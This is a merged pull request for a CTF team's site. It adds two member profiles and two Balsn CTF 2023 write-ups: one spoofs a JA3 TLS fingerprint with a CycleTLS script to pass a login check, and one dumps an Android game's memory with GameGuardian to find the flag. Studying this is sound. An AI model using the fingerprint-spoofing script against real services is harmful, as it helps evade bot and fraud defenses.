Merge pull request #56 from MettleSphee/main

BalsnCTF 2023 Init + two Write-ups + two new members to the about page

config.yaml

@@ -48,6 +48,19 @@ params:
         - I will find you, I'm really gonna find you...
         - The only Belgian of the team
         - FLAG{5TAY_CUR10U5_AND_CUNN1NG}
+    - name: MettleSphee
+      link: https://github.com/MettleSphee
+      picture: https://avatars.githubusercontent.com/u/69507856?s=400&u=6b8b52fb7d3634193be75ee1e60bd87457fd29e4&v=4
+      tags: [ 'osint','forensics','crypto','misc','mobile' ]
+      description:
+        - Don't let a bug ruin your amazing experience. Exploit it!
+    - name: cartouche70
+      link: https://github.com/DalmatianuSebikk
+      picture: https://avatars.githubusercontent.com/u/70603934?v=4
+      tags: ['web','forensics','crypto','misc']
+      description: 
+        - keeps injecting malicious code
+        - games and sports enjoyer.
   excludedSections:
     - about
   homeWriteupCnt: 10

content/balsnctf_2023/0FA.md

@@ -0,0 +1,107 @@
+---
+title: 0FA
+date: 2023-10-09
+tags:
+  - web
+author: cartouche70
+---
+
+# 0FA
+
+Description: I really don't like 2FA, so I created a 0FA login system!
+
+Challenge Author: kaibro
+
+- we have a php application
+- we can see that in index.php it s just a submit query input that can be vulnerable
+
+```html
+<form method="post" action="flag.php">
+            <div class="field">
+                <input type="text" class="input" name="username" placeholder="Username...">
+            </div>
+            <input type="submit" class="button is-primary"><br>
+        </form>
+```
+
+it goes to the flag.php
+
+```php
+<?php
+include_once("config.php");
+fingerprint_check();
+if(!isset($_POST['username']) || $_POST['username'] !== "admin")
+    die("Login failed!");
+?>
+```
+
+so, if the username is not admin, then login fails, but he also makes some fingerprint checks(). Maybe it’s exploitable, but let s try to put admin there first and see the request
+
+we sent a request to the server and we can see that we still have an error, but the username is indeed admin, we can look somewhere else. 
+
+in the config.php, there is a defined JA3 fingerprint and it checks if that fingerprint is the same as the one received by the server.
+
+```php
+<?php
+define("FINGERPRINT", "771,4866-4865-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,23-65281-10-11-35-16-5-13-18-51-45-43-27-17513,29-23-24,0");
+$flag = 'BALSN{fake_flag}';
+
+function fingerprint_check() {
+    if($_SERVER['HTTP_SSL_JA3'] !== FINGERPRINT) 
+        die("Login Failed!"); 
+}
+```
+
+After some research, we can see that the ja3 fingerprint can be impersonated.
+
+For that, I used CycleTLS, an npm module good for ja3 impersonation.
+
+```tsx
+const qs = require('qs');
+
+const initCycleTLS = require('cycletls');
+// Typescript: import initCycleTLS from 'cycletls';
+
+(async () => {
+  // Initiate CycleTLS
+  const cycleTLS = await initCycleTLS();
+  const bodyDict = {username:"admin"};
+  // Send request
+  const response = await cycleTLS('https://0fa.balsnctf.com:8787/flag.php', {
+    body: qs.stringify(bodyDict),
+    headers: {"Content-Type": "application/x-www-form-urlencoded"},
+    method: "POST",
+    ja3: '771,4866-4865-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,23-65281-10-11-35-16-5-13-18-51-45-43-27-17513,29-23-24,0',
+    userAgent: 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0'
+  }, 'post');
+
+  console.log(response);
+
+  // Cleanly exit CycleTLS
+  cycleTLS.exit();
+
+})();
+```
+
+after running this script, we have this output in console:
+
+```tsx
+{
+  status: 200,
+  body: '<html>\n' +
+    '<head>\n' +
+    '    <title>Balsn CTF 2023 - 0FA</title>\n' +
+    '    <meta charset="UTF-8">\n' +
+    '    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/css/bulma.min.css">\n' +
+    '</head>\n' +
+    '<body>\n' +
+    '  Here is your flag: BALSN{Ez3z_Ja3__W4rmUp}</body>\n' +
+    '</html>',
+  headers: {
+    Connection: 'keep-alive',
+    'Content-Type': 'text/html; charset=UTF-8',
+    Date: 'Mon, 09 Oct 2023 07:54:15 GMT',
+    Server: 'nginx/1.23.1'
+  }
+}
+```

content/balsnctf_2023/_index.md

@@ -0,0 +1,9 @@
+---
+title: Balsn CTF 2023
+date: 2023-10-09T17:15:16+03:00
+description: Writeups for [Balsn CTF 2023]
+place: 34
+total: 333
+draft: true
+---
+

content/balsnctf_2023/merger_2077.md

@@ -0,0 +1,73 @@
+---
+title: merger_2077
+date: 2023-10-09
+tags:
+  - reverse
+author: MettleSphee
+---
+
+## Challenge description
+
+Title: merger-2077
+
+Description:
+After a long and tiring ctf challenge, you decided to play a phone game to relax yourself. 
+Note: Flag is hidden somewhere in memory, and this challenge is safe to run directly on your device. 
+If you manage to run it on emulators, you shall fix it on your own.
+
+Challenge Author: asef18766
+
+## Solution
+
+One very straight-forward Android challenge, that doesn't really require much reversing at all.
+
+We get the following: 
+- the APK which contains the flag;
+- the information that the flag is in RAM;
+- problems on emulators, which could make this harder (presumably)?
+
+First thing I did (against all information given) was to decompile the APK with APKtool. Of course, nothing was found in the strings.
+Then I tried a second decompiler (with JADX) and looked through some of the .java files.
+Either it was about the way the physics works, or the way the flag was revealed,
+Although it seems irrelevant, I had the feeling that the flag was not available right when the app was executed.
+
+![title](/images/balsnctf_2023/images/Untitled.png)
+
+And I held that feeling to heart.
+
+To approach this, there aren't very many known memory browsing tools on Android, and very few (if any!) that can run on an unrooted device.
+A program that I could use was GameGuardian. It's just like a 'Cheat Engine', but for Android.
+It very rarely works without root access, so I needed a rooted device. Conveniently, I have one.
+After installing the two apps, we first run the tool:
+
+![title](/images/balsnctf_2023/images/Screenshot_20231009-153536_Svphk.png)
+
+Then the flag app:
+
+![title](/images/balsnctf_2023/images/Screenshot_20231009-153552_balsn-ctf-2023.png)
+
+We select the process:
+
+![title](/images/balsnctf_2023/images/Screenshot_20231009-153600_balsn-ctf-2023.png)
+
+Then at first, we have to scan for the type UTF-8 string "BALSN{", but to spare you a lot of reading,
+my hunch was right and I needed to 'play' the game for a bit until the string appeared in memory.
+I played until this point (approx. the 3rd generation of the strings in memory):
+
+![title](/images/balsnctf_2023/images/Screenshot_20231009-163420_balsn-ctf-2023.png)
+
+I searched for the string again, found the memory address of the string (each letter is a separate value),
+then jumped to the memory address, copied the memory address, then started to dump memory from that address:
+
+![title](/images/balsnctf_2023/images/Screenshot_20231009-163510_balsn-ctf-2023.png)
+![title](/images/balsnctf_2023/images/Screenshot_20231009-163528_balsn-ctf-2023.png)
+![title](/images/balsnctf_2023/images/Screenshot_20231009-163536_balsn-ctf-2023.png)
+![title](/images/balsnctf_2023/images/Screenshot_20231009-163602_balsn-ctf-2023.png)
+![title](/images/balsnctf_2023/images/Screenshot_20231009-153618_balsn-ctf-2023.png)
+![title](/images/balsnctf_2023/images/Screenshot_20231009-153640_balsn-ctf-2023.png)
+![title](/images/balsnctf_2023/images/Screenshot_20231009-154357_balsn-ctf-2023.png)
+
+After that, I read through the memory dump using HxD, search for "BALSN{", and the flag shall be revealed:
+
+![title](/images/balsnctf_2023/images/image.png)
+